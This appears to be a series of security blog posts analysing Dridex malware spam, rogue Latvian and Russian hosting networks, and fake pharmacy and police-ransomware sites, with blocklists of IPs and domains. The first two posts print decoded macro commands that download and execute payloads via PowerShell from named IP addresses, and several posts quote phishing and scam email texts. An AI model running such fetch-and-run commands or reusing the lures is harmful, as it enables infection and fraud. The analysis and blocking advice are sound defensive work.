Malware spam: "Unpaid invoice [ID:9876543210]" drops Dridex

This fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment

Date:    17 February 2015 at 14:05
Subject:    Unpaid invoice [ID:9876543210]

Some example attachment names are:

3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls

There are found different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different variety of macros, and unlike previous spam runs, these are individual modules (which frankly makes it no harder to analyse, just harder to put into Pastebin).

When we decrypt the strings in the macro, we see:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://62.76.43.194/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.4.232.206/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

This combines the recent Powershell trick with a new one. Instead of downloading an EXE file, it downloads and unpacks a CAB file, dfssk.cab which is saved in the %TEMP% folder and then expanded to %TEMP%\JIOiodfhioIH.exe.

These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)

Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV,  Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at  92.63.88.87.

ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)

This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.

Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243

Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"

This rather terse spam comes with a a malicious attachment:

From: Rosemary Gibbs
Date:    16 February 2015 at 10:12
Subject:    Re: Data request [ID:91460-2234721]

Copy of transaction.

The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are

869B54732.xls
BE75129513.xls
C39189051.xls

None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this (click to enlarge):

It's quite apparent that this is ROT13 encoded which you can easily decrypt at rot13.com rather than working through the macro. These three samples give us:

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"

So, these macros are attempting to use Powershell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57 and automated analysis tools [1] [2] [3] show attempted communications with:

85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)

It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.

Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151

Malware spam: "Remittance XX12345678"

This spam comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:

From:    Gale Barlow
Date:    13 February 2015 at 12:30
Subject:    Remittance IN56583285

Dear Sir/Madam,

I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.

Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.

Gale Barlow
Accounts Manager
4D PHARMA PLC


Boyd Huffman
Accounts Payable
GETECH GROUP 

There is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57 and it contains a malicious macrowhich downloads a file from the following location:

http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe

This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identifed as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following  IPs:

85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52  and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.

Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159

Something evil on 146.185.213.69 and probably the whole /24

146.185.213.69 caught my eye, hosting a number of "ads." subdomains, many of which are tagged by Google as being malicious (highlighted below)

ads.warmsanieren.de
ads.coaching-baum.de
ads.fatmansempire.de
ads.marktluecke-berlin.de
ads.xn--hoffmnsche-u5a.de
ads.lagu.la
ads.lad-consult.lu
ads.reachcms.co.uk
ads.martinwguy.co.uk
ads.ukbizrooms.co.uk
ads.ajcqualityassurance.co.uk
ads.warmsanieren.de
ads.coaching-baum.de
ads.fatmansempire.de
ads.marktluecke-berlin.de
ads.xn--hoffmnsche-u5a.de
ads.lagu.la
ads.lad-consult.lu
ads.reachcms.co.uk
ads.martinwguy.co.uk
ads.ajcqualityassurance.co.uk
ads.ukbizrooms.co.uk
ads.cto.lu
ads.hoa.lu
ads.blackcockinn.co.uk
ads.loumacfitness.co.uk
ads.cto.lu
ads.hoa.lu
ads.blackcockinn.co.uk
ads.loumacfitness.co.uk

Well, you can probably assume that all those domains are malicious (even without the ads. prefix). But a look at the IP address range was revealing:

inetnum:        146.185.213.0 - 146.185.213.255
netname:        Customer-Valyalov-net
descr:          net for user Valyalov (hosting and VPS)
country:        RU
admin-c:        VME12-RIPE
tech-c:         VME12-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-routes:     LIPATOV-MNT
source:         RIPE # Filtered

person:         Valyalov Mikhail Evgenyevich
address:        Sankt-Petersburg, Volynski per., d. 2, lit. A, pom. 12N
phone:          +79099740171
nic-hdl:        VME12-RIPE
mnt-by:         VEROX-MNT
source:         RIPE # Filtered

route:          146.185.213.0/24
descr:          Valyalov-Net @ RN-Data/AltNet datacenter
origin:         AS41390
mnt-by:         LIPATOV-MNT
source:         RIPE # Filtered

The block is owned by RN Data SIA of Latvia and suballocated to somebody in St Petersburg by the name of  Mikhail Evgenyevich Valyalov. RN Data are one of those hosts that have hosted malware in the past, and I tend to lean towards blocking them.

A look at the other contents of the /24 appear [csv] to indicate further suspicious activity, especially f528764d624db129b32c21fbca0cb8d6.com on 146.185.213.53 (mentioned here plus several other places).

So, frankly this entire /24 looks like it is being used for evil purposes at the moment and I recommend that you block it, plus these following domains:

man.liborcartel.com
letter.liborscam.com
kick.lmfho.co.uk
kiss.mbnappiclaim.co.uk
impulse.nrgcard.co.uk
increase.olympicclaims.co.uk
history.parkingclaims.co.uk
heat.onlinefuelcard.co.uk
hole.parkingclaims.com
33db9538.com
54dfa1cb.com
blue.azhealthlawblog.com
board.milliganlawless.com
body.phoenixhealthlaw.com
blow.arizonahealthlawyers.com
exchange.phoenixhealthlawyers.com
boat.milliganlawlesstaylormurphybailey.com
regentimpaired.com
revealedattached.com
f528764d624db129b32c21fbca0cb8d6.com
warmsanieren.de
coaching-baum.de
fatmansempire.de
marktluecke-berlin.de
xn--hoffmnsche-u5a.de
lagu.la
lad-consult.lu
reachcms.co.uk
martinwguy.co.uk
ukbizrooms.co.uk
ajcqualityassurance.co.uk
cto.lu
hoa.lu
blackcockinn.co.uk
loumacfitness.co.uk
ellis-fuhr.us

Malware sites to block 18/4/13, revisited

Quite late last night I posted some malicious IP address that I recommend blocking. I've had a chance to look at these more deeply, and some of them are in known bad IP ranges that you should consider blocking.

Most of these IP ranges are in Russia, blocking them will probably block some legitimate sites. If you don't do much business with Russia then it will probably not be an issue, if you do then you should exercise caution. There's a plain list at the bottom if you simply want to copy-and-paste.

Detected IP	Recommended block	Owner
5.9.191.179	5.9.191.160/26	(CyberTech LLC, Russia / Hetzner, Germany)
5.45.183.91	5.45.183.91	(Bradler & Krantz, Germany)
5.135.67.215	5.135.67.208/28	(MMuskatov-IE / OVH, France)
5.135.67.217
23.19.87.38	23.19.87.32/29	(Di & Omano Ltd, Germany / Nobis Technology, US)
37.230.112.83	37.230.112.0/23	(TheFirst-RU, Russia)
46.4.179.127	46.4.179.64/26	(Viacheslav Krivosheev, Russia / Hetzner Germany)
46.4.179.129
46.4.179.130
46.4.179.135
46.37.165.71	46.37.165.71	(BurstNET, UK)
46.37.165.104	46.37.165.104	(BurstNET, UK)
46.105.162.112	46.105.162.112/26	(Shah Sidharth, US / OVH, France)
62.109.24.144	62.109.24.0/22	(TheFirst-RU, Russia)
62.109.26.62
62.109.27.27
80.67.3.124	80.67.3.124	(Portlane Networks, Sweden)
80.78.245.100	80.78.245.0/24	(Agava JSC, Russia)
91.220.131.175	91.220.131.0/24	(teterin Igor Ahmatovich, Russia)
91.220.131.178
91.220.163.24	91.220.163.0/24	(Olevan plus, Ukraine)
94.250.248.225	94.250.248.0/23	(TheFirst-RU, Russia)
108.170.4.46	108.170.4.46	(Secured Servers, US)
109.235.50.213	109.235.50.213	(xenEurope, Netherlands)
146.185.255.97	146.185.255.0/24	(Petersburg Internet Network, Russia)
146.185.255.207
149.154.64.161	149.154.64.0/23	(TheFirst-RU, Russia)
149.154.65.56
149.154.68.145	149.154.68.0/23	(TheFirst-RU, Russia)
173.208.164.38	173.208.164.38	(Wholesale Internet, US)
173.234.239.168	173.234.239.160/27	(End of Reality LLC, US / Nobis, US)
176.31.191.138	176.31.191.138	(OVH, France)
176.31.216.137	176.31.216.137	(OVH, France)
184.82.27.12	184.82.27.12	(Prime Directive LLC, US)
188.93.211.57	188.93.210.0/23	(Logol.ru, Russia)
188.120.238.230	188.120.224.0/20	(TheFirst-RU, Russia)
188.120.239.132
188.165.95.112	188.165.95.112/28	(Shah Sidharth, US / OVH France)
188.225.33.62	188.225.33.0/24	(Transit Telecom, Russia)
188.225.33.117
192.210.223.101	192.210.223.101	(VPS Ace, US / ColoCrossing, US)
193.106.28.242	193.106.28.242	(Centr Informacionnyh Technologii Online, Ukraine)
193.169.52.144	193.169.52.0/23	(Promobit, Russia)
195.3.145.99	195.3.145.99	(RN Data, Latvia)
195.3.147.150	195.3.147.150	(RN Data, Latvia)
198.23.250.142	198.23.250.142	(LiquidSolutions, Bulgaria / ColoCrossing, US)
198.46.157.174	198.46.157.174	(Warfront Cafe LLC, US / ColoCrossing, US)
205.234.204.151	205.234.204.151	(HostForWeb, US)
205.234.204.190	205.234.204.190	(HostForWeb, US)
205.234.253.218	205.234.253.218	(HostForWeb, US)
213.229.69.40	213.229.69.40	(Poundhost, UK / Simply Transit, UK)

5.9.191.160/26
5.45.183.91
5.135.67.208/28
23.19.87.32/29
37.230.112.0/23
46.4.179.64/26
46.37.165.71
46.37.165.104
46.105.162.112/26
62.109.24.0/22
80.67.3.124
80.78.245.0/24
91.220.131.0/24
91.220.163.0/24
94.250.248.0/23
108.170.4.46
109.235.50.213
146.185.255.0/24
149.154.64.0/23
149.154.68.0/23
173.208.164.38
173.234.239.160/27
176.31.191.138
176.31.216.137
184.82.27.12
188.93.210.0/23
188.120.224.0/20
188.165.95.112/28
188.225.33.0/24
192.210.223.101
193.106.28.242
193.169.52.0/23
195.3.145.99
195.3.147.150
198.23.250.142
198.46.157.174
205.234.204.151
205.234.204.190
205.234.253.218
213.229.69.40

"Support Center" spam / phticker.com

Not malware this time, but this fake "Support Center" spam leads to a fake pharma site at phticker.com:

Date:      Mon, 11 Feb 2013 06:13:52 -0700
From:      "Brinda Wimberly" [noreply@mdsconsulting.be]
Subject:      Support Center

    Welcome to Help Support Center

Hello,

You have been successfully registered in our Ticketing System

Please, login and check status of your ticket, or report new ticket here

See All tickets
   
Go To Profile

This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.

The site appears to be clean from a malware perspective and is hosted on 171.25.190.246 (Verus AS, Latvia) along with these other fake pharma sites:

nislevitra.com
tablethealthipad.com
tivozanibkimedicine.com
marijuanarxmedicine.com
drugstorepharmacycenterline.com
medicalwelhealthcare.com
physicianslnesshealth.com
newhealthpharm.com
gokeyscan.com
medpillsprescription.com
wichigenerics.com
boschmeds.com
pillcarney.com
healthviagraobesity.com
pharmedicinehat.net
rxlevitrainc.eu
tabletdrugipad.eu
pillsphysicpharma.ru
xree.ru
lxie.ru
zeap.ru
tabspharmacytablets.ru
pillsmedicalsrx.ru
poey.ru
ongy.ru
phticker.com

IMDB "Your password is too weak" spam / thepharmhealth.com

This spam leads to a fake pharma site at thepharmhealth.com:

Date:      Sat, 9 Jun 2012 18:20:35 -0700 (PDT)
From:      IMDb User Protection [do-not-reply-here@imdb.com]
Subject:      Your password is too weak

This is an automatic message from the Internet Movie Database (IMDb) registration system.
Our system detected your password is too weak. Short passwords are easy to guess.

Please follow this link :

https://secure.imdb.com/password_update/imdb/74129625140408804050

If you used your IMDb password at any other sites, you'll need to change those passwords as well.

Regards,
IMDb User Protection help
http://imdb.com/register/

It's an interesting and novel approach, and it could easily be adapted for malware rather than fake prescriptions. thepharmhealth.com is hosted on 80.232.131.201 (SIA Lattelecom, Latvia).

"Amazon.com Password Assistance" spam / healthcarewelbizness.com

The fake pill pushers are getting inventing, this spam leads to a fake pharma site on healthcarewelbizness.com :

Date:      Fri, 27 Apr 2012 04:47:10 +0000 (UTC)
From:      "Amazon.com" [account-update@amazone.com]
Subject:      Amazon.com Password Assistance

We received a request to reset the password associated with this e-mail address. Please follow the instructions below.

Click the link below to complete or cancel request using our secure server:

https://www.amazon.com/ap/forgotpassword?arb=cf4c17ba-4659-06c6-ff0f-58f6e8b50a66

If clicking the link doesn't seem to work, you can copy and paste the link into your browser's address window, or retype it there.

Amazon.com will never e-mail you and ask you to disclose or verify your Amazon.com password, credit card, or banking account number. Thanks for visiting Amazon.com!

healthcarewelbizness.com is hosted on 46.183.216.215 (Dataclub, Latvia) along with a whole load of other toxic websites that are best avoided.

NACHA Spam / evrymonthnighttry.com and glasseseverydaynow.com

More NACHA themed spam this morning that redirects victims through a hacked legitimate site to a malware laden page, this time hosted on evrymonthnighttry.com or glasseseverydaynow.com.

These sites are hosted on 46.183.217.119 (Dataclub, Latvia). I can't see anything at all of value in 46.183.216.0/21 so blocking access to all of that range might be prudent.

It also attempts to load an exploit from a site called bbb-complains.org which is not resolving at present.

A couple of example emails:

Date:      Thu, 15 Dec 2011 07:42:51 +0000
From:      "risk.manager@nacha.org" [risk.manager@nacha.org]
Subject:      Your ACH transaction details

Attention: Accounting Department

This message includes an important information regarding the ACH debit transfer sent on your behalf, that was detained by our bank:
Transaction ID:    079788807282357
Transaction status:    pending

In order to resolve this matter, please use the link below to review the transaction details as soon as possible.

Yours faithfully,
Anthony Cooley
Chief Accountant

and

Date:      Thu, 15 Dec 2011 07:30:43 +0000
From:      "alert@nacha.org" [alert@nacha.org]
Subject:      Your pending ACH debit transfer

Dear Sir or Madam,

Please find below a report about the ACH debit transfer sent on your behalf, that was kept back by our bank:
Transaction #:    638798200851317
Status of the transaction:    pending

In order to resolve this matter, please review the transaction details using the link below as soon as possible.

Yours truly,
Kevin Hunt
Chief Accountant

Some TDL/TDSS rootkit sites to block

The following IPs are related to the TDL/TDSS rootkit. 212.36.9.52 / gic-kbmtu0zkvwylf.com appears to be a C&C server.

94.63.149.10
94.63.149.11
94.63.149.12
94.63.149.13
94.63.149.14
94.63.149.15
146.185.250.140
146.185.250.141
195.3.145.251
195.3.145.252
195.3.145.253
212.36.9.52

94.63.149.0/24 is a Romanian host called Eurolan Solutions SRL, I've had this blocked for months with no ill-effects. 146.185.0.0/16 is Petersburg Internet Network Ltd in Russia, the whole /16 is sparsely populated and blocking that would probably do no harm. 195.3.144.0/22 is Latvia host RN Data SIA, given that Latvia hosts are such a sewer then blocking the /22 is probably also a good idea.

As for 212.36.9.52 (OTEL, Bulgaria), there appear to be a few malware servers in 212.36.8.0/23 mixed with several legitimate sites. 212.36.9.60, 212.36.9.52 and 212.36.9.52 also appear to be malicious. Blocking 212.36.0.48/28 should filter out the bad sites without blocking good ones.

The following domains are associated with these IPs, if you can't block by IP then blocking these might be a good idea,

bejb883-njm.com
bxwqxlkp4ajt.com
feeew0r-geek.com
gic-kbmtu0zkvwylf.com
gv47numkmkmfub8790.com
hhnnbtcnotcf3ohtxt.com
j5dlz7rxoto8g1fubb.com
jblextyhsfqttkz.com
jhv684ybknjkm.com
keter-jankinsome.com
q9-e52wjh7cz.com
retgen-rasch12.com
retno-uhb3.com
rzncgorop-yvpx.com
serch-iteration.com
tylt9avnpfl-zdk.com
uh-i99ur3qa9t3ssw.com
upsbkschmajhlxs6.com
vbhw53jnjjn00o.com
x24l0jpdhtccng-ojw.com
xcxmjb2joopypo.com
zhfg0l5eijw4tjxc.com
zw5kfhmujx024saj2.com

Evil network: Relikts BVK / Sagade Ltd (46.252.130.0/23)

This summary is not available. Please click here to view the post.

Some fake Bundeskriminalamt and Bundespolizei sites

Here are some more fake sites pretending to be the Bundeskriminalamt and Bundespolizei (agencies of the German Federal Police) which are probably worth blocking, following on from these.

193.105.240.204 [Sia Vps Hosting, Latvia]
bundespolizei-de.net
bundespolizei-de.org
bundespolizei-online.com
dpolg-bundespolizei.org
inter-bundeskriminalamt.org

77.87.229.14 [Invalid pointer to bundespolizei.de]
inter-bundeskriminalamt.eu
dpolg-bundespolizei.org [also on 193.105.240.204]
inter-bundeskriminalamt.org [also on 193.105.240.204]

211.154.153.49 [China Motion Network Communication]
agentbundeskriminalamt.net
bundeskriminalamtde.net
onlinebundeskriminalamt.net
torrentbundeskriminalamt.net

Note that 77.87.229.14 is actually the real IP for bundespolizei.de, but the scammers are pointing their DNS records to it, presumably to cause confusion.

You can safely block access to 193.105.240.0/24 (Sia VPS) without much fear of losing anything important. The Chinese netblock is more mixed, but blocking at least 211.154.153.49 might be a good idea if you are in Germany.

bundespolizei-online.com is not the Bundespolizei

bundespolizei-online.com is a fake domain pretending to be the Bundespolizei (German Federal Police). It appears to be part of a malware scam that has been around for a while, where the victim is told that they have done something illegal and need to pay a fine to the police.

The text of the message might vary, but the last scam domain  was used in conjunction with a message that read:

Es ist ungesetzliche Tätigkeit enthüllt
Achtung!!!
Ein Vorgang illegaler Aktivitäten wurde erkannt.
Das Betriebssystem wurde im Zusammenhang mit Verstoßen gegen die Gesetze der Bundesrepublik Deutschland gesperrt! Es wurde folgender Verstoß festgestelltt: Ihre IP Adresse lautet "x.x.x.x" mit dieser IP wurden Seiten mit pornografischen Inhalten,Kinderpornographie, Sodomie und Gewalt gegen Kinder aufgerufen Auf Ihrem Computer wurden ebenfalls Videodateien mit pornografischen Inhalten, Elementen von Gewalt und Kinderpornografie festgestellt! Es wurden auch Emails in Form von Spam, mit terroristischen Hintergründen, verschickt. Diese Sperre des Computers dient dazu, Ihre illegalen Aktivitäten zu unterbinden.
Ihre IP: x.x.x.x
Location: XXXXX
ISP: XXXXX
Um die Sperre des Computers aufzuheben, sind Sie dazu verflichtet eine Strafe von 100 Euro zu zahlen. Sie haben zwei Möglichkeiten die Zahlung von 100 Euro zu leisten.

    1) Die Zahlung per Ukash begleichen:
    Dazu geben Sie bitte den erworbenen Code in das Zahlungsfeld ein und drücken Sie anschliessend auf OK (haben Sie mehrere Codes,so geben Sie Diese einfach nacheinander ein und drücken Sie anschliessend auf OK) Sollte das System Fehler melden,so müssen Sie den Code per Email (einzahlung@dpolg-bundespolizei.org) versenden.
    2) Die Zahlung per Paysafecard begleichen:
    Dazu geben Sie bitte den erworbenen Code (gegebenfalls inkl. Passwort) in das Zahlungsfeld ein und drücken Sie anschliessend auf OK (haben Sie mehrere Codes,so geben Sie Diese einfach nacheinander ein und drücken Sie anschliessend auf OK) Sollte das System Fehler melden,so müssen Sie den Code per Email(einzahlung@dpolg-bundespolizei.org) versenden.

This roughly translates as:

It is illegal activity revealed
Attention!
An operation of illegal activity has been detected.
The operating system was blocked in connection with Violating the laws of the Federal Republic of Germany! It was festgestelltt following violation: Your IP address is "xxxx" with the IP were pages containing pornography, child pornography, bestiality and violence invoked against children on the computer were also video files containing pornography, found elements of violence and child pornography! There were also emails sent in the form of spam, with terrorist backgrounds. This serves to lock the computer to stop your illegal activities.
Your IP: x.x.x.x
Location: XXXXX
ISP: XXXXX
To unlock the computer, you have to pay a penalty verflichtet of 100 €. You have two ways to make the payment of 100 €.

     1 pay) Payment via Ukash:
     You enter the acquired code into the payment box and then press OK (you have multiple codes, enter this simply a sequence, then press OK) If the system is wrong, you have the code by email (einzahlung@dpolg-bundespolizei.org) ship.
     2) The payment by paysafecard to pay:
     You enter the acquired code (if necessary including password) into the payment box and then press OK (you have multiple codes, enter this simply a sequence, then press OK) If the system is wrong, so you must send the code by email (einzahlung@dpolg-bundespolizei.org).

A €100 fine for terrorist likes and download child pornography? Obviously this is nonsense, but the victim might well try to pay to get rid of the trojan.

The bundespolizei-online.com is quite interesting to look at. First, there is the WHOIS record:

    Steffen Schüssler
    Email: t-mart-admin@teiekom.de
    Organization: Hostmaster T-Systems
    Address: Vahrenwalder Strasse 240-247
    City: Hannover
    State: Hannover
    ZIP: 30159
    Country: DE
    Phone: +49.43171633486
    Fax: +49.43171633486

It looks legitimate enough. T-Systems is the hosting division of Deutsche Telekom, and the email address looks legitimate at first glance.. but wait, it says teiekom.de and not telekom.de which can't be right.

The domain is registered through the Russian registrar Regtime Ltd. The site bundespolizei-online.com is hosted on 193.105.240.204 in Latvia. Latvia is pretty much a hotbed of crime, and the AS12578 block has a pretty bad reputation, and the whole 193.105.240.0/24 range looks quite toxic. As is common with malicious sites such as this, all the mail is handled by Google.

So.. if you see a message soliciting an email reply to bundespolizei-online.com or running on the same website then it is malware, and you should try to disinfect your machine using up-to-date antivirus software, or you could try following the instructions here.

Christwire.org hacked with sokoloperkovuske.com redirect

This summary is not available. Please click here to view the post.

Peteris Sahurovs and Marina Maslobojeva arrested: Sagade hopefully busted

Another victory for the good guys, according to El Reg.

The Department of Justice and the FBI have cracked an international scareware ring believed to have scammed over $72m (£45m).

The gang screwed money out of more than a million victims. They installed software on their computers which falsely claimed to have detected viruses or malware. The gang then took payment for supposedly cleaning up the machines.

22-year-old Peteris Sahurovs and 23-year-old Marina Maslobojeva were arrested in Latvia on charges made in court in Minnesota. 

Although there are several bad hosts in Latvia, the one that really stands out is Sagade Ltd. And it looks very much as if Peteris Sahurovs worked for Sagade, his screen name on the internet was piotrek89 which was also the abuse address for the Sagade network.

Sagade seemed to be linked to a number of other Latvian outfits, so hopefully this will make a major dent in malicious activity from that country. Until it gets cleaned up though, Latvian netblocks should still be treated with suspicion.

The FBI have a press release about it here.

Evil network: Sagade Latvia AS52055 (46.252.130.0/23) and traff4you.info

I've covered Sagade before, which appears to be a completely black hat web host with no legitimate domains at all. Sagade appear to have a new IP range in the 46.252.130.0 - 46.252.131.255 range which are completely full of toxic sites that should be blocked.

This IP range forms AS52055, of which Google says:

Safe Browsing
Diagnostic page for AS52055 (RELIKT)

What happened when Google visited sites hosted on this network?

    Of the 159 site(s) we tested on this network over the past 90 days, 9 site(s), including, for example, opanaw.com/, videospartyh.info/, galleryhotf.info/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2011-02-23, and the last time suspicious content was found was on 2011-02-23.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 16 site(s) on this network, including, for example, welcometotheglobalisnet.com/, 46.252.129.0/, welcometotheglobaliscom.com/, that appeared to function as intermediaries for the infection of 507 other site(s) including, for example, ctwatchdog.com/, deewanapan.com/, thedailyherald.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 55 site(s), including, for example, 46.252.129.0/, sontollones.co.cc/, toney.co.cc/, that infected 2312 other site(s), including, for example, cmsocial.com/, mediafire.com/, aotsargentina.org.ar/.

SiteVet oddly shows the AS as being offline, but the accompanying "badness" chart shows a big leap in evilness since the beginning of the year, so perhaps the block was reallocated.

As well as .com domains and the like, the block hosts several hard-to-spot .cz.cc and .vv.cc domains which host malware, much of which is being distributed through an apparently bogus ad network at traff4you.info.

So far, I can see see the following domains in the block (a list with IP addresses and MyWOT ratings can be downloaded from here):

ertmovs.com
lkjsnfs.com
antivirussystem2011get.com
bbuydelivery.com
berrydush.net
brewtonconsult.net
collach.com
ddk2200.com
enter-way.net
euro2012corp.com
facebook-surprise-njwo.tk
facebook-surprise-njww.tk
fire6495ksd.com
fotoshare-2dknc.com
gigomark.com
grapndet.com
htss.su
hyipl.info
ibifit.com
lokia.info
lost-pass.ru
lostpass.ru
mailx.su
mittmax.com
nanosearchpro.net
novasystemutils2011.com
sentex10zx.in
shabgdr.com
softstoreinc.com
spy4.net
stylus2641fm.com
trabniyd.com
turb-o-search.com
x-pass.ru
xaker.me
nalmeron.cz.cc
agamaris.vv.cc
dalalore.vv.cc
thetakus.vv.cc
maribandis.vv.cc
mogrinn.vv.cc

Registration details for this block are:

inetnum:        46.252.130.0 - 46.252.131.255
netname:        Sagade
descr:          users
country:        LV
admin-c:        AK6804-RIPE
tech-c:         AK6804-RIPE
status:         ASSIGNED PA
mnt-by:         andrejskaminskis-mnt
source:         RIPE # Filtered

person:         Andrejs Kaminskis
address:        Latgales 32/34, Rezekne, Latvia
phone:          +37127580487
e-mail:         reliktbvk@gmail.com
nic-hdl:        AK6804-RIPE
mnt-by:         andrejskaminskis-mnt
source:         RIPE # Filtered

route:          46.252.130.0/23
descr:          users
origin:         AS52055
mnt-by:         andrejskaminskis-mnt
source:         RIPE # Filtered

As I said, traffic seems to be fed through traff4you.info, registered on 10th Decemeber 2010 with anonymous registration details and currently hosted on a dedicated server at 206.161.200.11, but until recently it was on a shared server on 69.65.48.218. This is probably a good domain to block, and I can't see much harm in blocking access to 206.161.200.0/24 and 69.95.48.0/24 while you're at it too.

Evil network: DG Holding SIA / ALTNET-LV AS41390 (195.3.144.0/22)

DG Holding SIA / ALTNET-LV is another evil network, and it's no surprise to see that it is in Latvia. The 195.3.144.0/22 hosts sites involved in hacking, malware distribution, MLM scams, fake goods and porn plus a number of ZeuS C&C servers.

There are a small number of legitimate customers in this block, but they most cater for Latvian users only.. if you are outside of Latvia, then very little will be lost by blocking this entire /22 (195.3.144.0 - 195.3.147.255).

There's a listing of domains, IPs and MyWOT ratings here [csv] if you want to probe more deeply and avoid blocking the handul of legitimate sites.. otherwise, I would recommend blocking the lot.

[Updated] Evil network: Donstroy Ltd AS29557 (194.8.250.0/23)

UPDATE:  this IP range is now used by a completely different organisation, and malicious activity no longer exists and the block is safe to use. However, the post will remain up for research purposes.

Another network worth blocking, Donstroy Ltd appears to be a Latvia entity hosting in Moldova, closely affiliate with Sagade Ltd who are one of the most scummy networks around at the moment.

The WHOIS details show a tell-tale link to Sagade in the email address:

inetnum:         194.8.250.0 - 194.8.251.255
netname:         Donstroy-1
descr:           Donstroy Ltd.
country:         LV
org:             ORG-DL107-RIPE
admin-c:         JS1050
tech-c:          JS1050
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          MNT-DONSTROY
mnt-routes:      MNT-DONSTROY
mnt-domains:     MNT-DONSTROY
source:          RIPE # Filtered

organisation:    ORG-DL107-RIPE
org-name:        Donstroy Ltd.
org-type:        OTHER
address:         Kalinina 19, 6, Bendery, Moldova
e-mail:          sagade95@gmail.com
mnt-ref:         MNT-DONSTROY
mnt-by:          MNT-DONSTROY
source:          RIPE # Filtered

person:          Juris Sahurovs
address:         Rezekne Darzu iela 21
phone:           +37120034981
nic-hdl:         JS1050
e-mail:          sagade95@gmail.com
source:          RIPE # Filtered

% Information related to '194.8.250.0/23AS29557'

route:           194.8.250.0/23
descr:           donstroy-route-1
origin:          AS29557
mnt-by:          MNT-DONSTROY
source:          RIPE # Filtered

Google's Safe Browsing diagnostics are not good:

